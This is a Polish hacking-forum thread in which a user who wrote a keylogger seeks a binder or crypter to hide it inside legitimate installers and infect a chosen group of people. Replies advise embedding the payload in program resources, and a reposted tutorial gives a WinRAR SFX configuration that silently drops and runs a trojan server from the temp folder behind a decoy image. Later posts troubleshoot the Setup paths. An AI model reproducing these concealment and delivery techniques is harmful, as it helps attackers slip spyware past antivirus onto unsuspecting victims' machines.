Binder

tiktakus

Użytkownik
Dołączył
Grudzień 10, 2010
Posty
4
Witam. Stworzylem swoj keylogger w c++ builderze no i dobra sam keyloggerjest niewykrywalny ale chcialbym go pod cos dolączyc i tu problem zbindowany plik staje sie juz wykrwyalny. Zna ktos godny polecenia binder? A moze jest ktos posiadaczem tego:csharpcrypter ?
Prosiłbym o pomoc, z gory dzieki.
 

tiktakus

Użytkownik
Dołączył
Grudzień 10, 2010
Posty
4
Próbowałem sciagnelem paczke +/- 20 binderów zadnym nie dało rady poniewaz wg mnie one byly juz stare i znane ..
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
wpakuj jakiś program do zasobów swojego programu, zmien ikonkę, i podczas uruchamiania go wypakuj i uruchom program ktory trzymales w zasobach a Twoj keylogger niech robi swoje w tle :) pomysl
 

tiktakus

Użytkownik
Dołączył
Grudzień 10, 2010
Posty
4
Chodzi Ci zeby winrarem utworzyc archiwum SFX i w komentarzu dodac zeby odpalil sie moj keylogg w tle.. Znam, robilem nic z tego..
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
Twierdzisz ze stworzyłeś keyloggera w borland C++ a nie wiesz co to zasoby oO powodzenia w dalszych osiągach.
 

tiktakus

Użytkownik
Dołączył
Grudzień 10, 2010
Posty
4
Dobra, nie pisze tu zeby komus cos udowadniac.
Do rzeczy tu moje czytanie ze zrozumieniem sie klania.. Ale dobra nie o ten efekt mi chodzi, nie chodzi mi o cos takiego ze np. leci instalator przy jakies 30% Error i koniec a program wlasciwy dziala. Myslalem o przylączeniu do istniejącego programu z przyczyn oczywistych, mam grupe ludzi do ktorych moj szkodnik ma trafic a oni nie beda oni instalowac gg czy skypa czy czegos innego z niepewnego źródła.
 

sir.COLA

Użytkownik
Dołączył
Marzec 8, 2010
Posty
41
W tym arcie poruszę tematykę WinRar'a, a dokładniej archiwum SFX...

O co chodzi?!
Otóż archiwum to, jest `Samowypakowywującym się Archiwum WinRara`. :)
Jak każdy widzi, dodaje się pliki normalnie, tyle że tam zaznacza się `Utwórz Archiwum SFX`...
Po Wygenerowaniu tworzy się plik exe, zaś po odpaleniu go jest forma wypakowywania :)

Objaśnienie
W tym pseudo-arcie omówię jakie ma tenże format archiwum ma opcję...
- Zawiera on swoje komendy, które należy pisać w komentarzu pliku (ostatnia zakładka podczas dodawania do pliku)
Jakie to komendy? Zaraz opiszę!


1. Wskazanie folderu docelowe wypakowywania plików:
Kod:
Path=SCIEZKA_DO_FOLDERU_DOCELOWEGO

SavePath
2. Uruchomienie pliku po wypakowywaniu plików (chodzi oczywiście o plik, który znajdował się w Archiwum):

Kod:
Setup=NAZWA_PLIKU.JPG.EXE.HTML
3. Uruchomienie plik przez wypakowaniem plików (tutaj już nie chodzi o plik który znajdował się w Archiwum; mógł być luźno na dysku twardym):
Kod:
Presetup=C:/PLIK.EXE.LOL.TXT
4. Plik do usunięcia z folderu docelowego:


Kod:
delete=PLIK.LOL.EXE.JPG.OMG
Kod:
5. Dodanie tytułu oraz tekstu w Archiwum SFX:


Kod:
Title=TYTUL_OKNA_ARCHIWUM

Text

{

PIERWSZA LINIA TEXTU DO WYSWIETLENIA

DRUGA LINIA TEXTU DO WYSWIETLENIA

TRZECIA LINIA [...]

}
6. Wyświetlenia okna licencji, wraz z treścią:

Kod:
License=TYTUL_OKNA_LICENCJI

{

PIERWSZA LINIA TEXTU DO WYSWIETLENIA

DRUGA LINIA TEXTU DO WYSWIETLENIA

TRZECIA LINIA [...]

}
To są ogólne komendy, ale archiwum SFX posiada jeszcze komendy do ukrywania głównej formy, a także nadpisywania/lub nie plików... Oto one:

Ukrycie formy archiwizatora

Kod:
Gdzie X jest:
2 - Ukrywanie dialogów Startowych (Automatycznie wypakowanie pliku, ale "widać" że coś się wypakowywuje)
1 - Ukrywanie wszystkiego, poprostu plik się wypakowywuje bez wiedzy użytkownika..
Jeśli chcesz aby forma była widoczna, zostaw te komendy...

Nadpisywanie plików


Kod:
Gdzie X jest:
1 - Nadpisuje wszystkie pliki bez wiedzy użytkownika
2 - Pomija wszystkie istniejące pliki, i ich nie wypakowywuje
Jeśli zaś chce by archiwum za każdym razem pytalo `Czy chcesz napisać te[...]` to zostaw te komeny (;

Teraz dodam mały przykład zastosowania tych komend dla lepszego zrozumienia faktu ich działania:

Kod:
path=%temp%

SavePath

Setup=SERVER_TROJANA.EXE

Setup=ZDJECIE_DLA_ZMYLKI.JPG

Silent=1

Overwrite=1
Objaśnienie: Archiwium to wypakuje bez wiedzy użytkownika ServerTrojana i także ZdjęcieDlaZmylki do folderu tymczasowego, które potem uruchomi. Jak każdy wie, servery są ukryte, czyli u ofiary odpali się tylko zdjęcie!



POMYŚLEĆ DO CZEGO MOŻNA TO WYKORZYSTAĆ

Źródło: http://haker.com.pl/threads/13047-Archiwum-SFX-gt-Tajniki-tych-plików-TUT
 
Ostatnio edytowane przez moderatora:

apaczkrk

Użytkownik
Dołączył
Maj 23, 2012
Posty
22
Mam taki kłopot , tworzę archiwum SFX wpisuję np. setup=aa.exe oczywiście plik aa.exe jest w archiwum, przy wypakowywaniu otrzymuję komunikat " system windows nie może odnaleźć pliku aa.exe. Upewnij się że wpisana nazwa jest poprawna i spróbuj ponownie"
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
Mam taki kłopot , tworzę archiwum SFX wpisuję np. setup=aa.exe oczywiście plik aa.exe jest w archiwum, przy wypakowywaniu otrzymuję komunikat " system windows nie może odnaleźć pliku aa.exe. Upewnij się że wpisana nazwa jest poprawna i spróbuj ponownie"

Może plik aa.exe to wirus i antywirus go blokuje? jezeli takowy masz.
 

apaczkrk

Użytkownik
Dołączył
Maj 23, 2012
Posty
22
Nie , to żaden wirus, zresztą antywira mam wyłączonego... jak wpiszę setup=bb.jpg to efekt taki sam, nie otwiera jpg-a tylko wywala błąd
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828

apaczkrk

Użytkownik
Dołączył
Maj 23, 2012
Posty
22
Tak właśnie robię. Po ludzku zaznaczam archwium sfx i albo w komentarzach wpisuję setup=aa.exe albo w advanced zakładka setup - wpisuje aa.exe efekt taki sam....
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
to powiedz mi co to te aa.exe bo nie rozumiem, gdzie Ty to wpisujesz? w tym advenced
 

apaczkrk

Użytkownik
Dołączył
Maj 23, 2012
Posty
22
aa to instalator gg tylko nazwę zmieniłem na aa.exe żeby było łatiwej. w advanced jest zakładka setup tam jest uruchom przed albo uruchom po instalacji. druga opcja to w zakładce komentarze wpisuję setup=aa.exe
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
rozumiem, wiec jeżeli pisze CI że nie można zlokalizowac pliku to widocznie nie można, wpisanie samego aa.exe spowoduje, że program będzie go szukał zapewne w folderze gdzie leży dane archiwum SFX. Aby poprawnie to zostało uruchomione powinieneś podać pełną scieżkę do pliku aa.exe, jeżeli chcesz opcje uruchom po wypakowaniu, to powinieneś podać scieżkę taką samą jak podałeś w docelowej lokalizacji do wypakowania plików dla archiwum SFX.

Do wpisania lokalizacji uniwersalnych możesz użyć zmiennych środowiskowych

Upewnij sie także czy po wypakowaniu archiwum sfx plik aa.exe rzeczywiście znajduje się tam gdzie się go spodziewasz.
 

apaczkrk

Użytkownik
Dołączył
Maj 23, 2012
Posty
22
KAtalog do rozpakowania jest jako bieżący , to proszę napisz mi jak powinien dokładnie wyglądać komentarz

Ok poszło :) Wielkie dzięki, ustawiłem rozpakowanie na c:/
w komentarzu setup=c:/xxx/aa.exe

a jak ma wyglądać setup jeśli plik zostanie rozpakowany w miejscu zapisania archiwum? Ktoś go odbiera np do c:/pobrane , ale ja nie wiem tego gdzie on ten plik zapisze

Ok cofam głupie pytanie ;) Wszystko już jest ok
 
Ostatnia edycja:
Do góry Bottom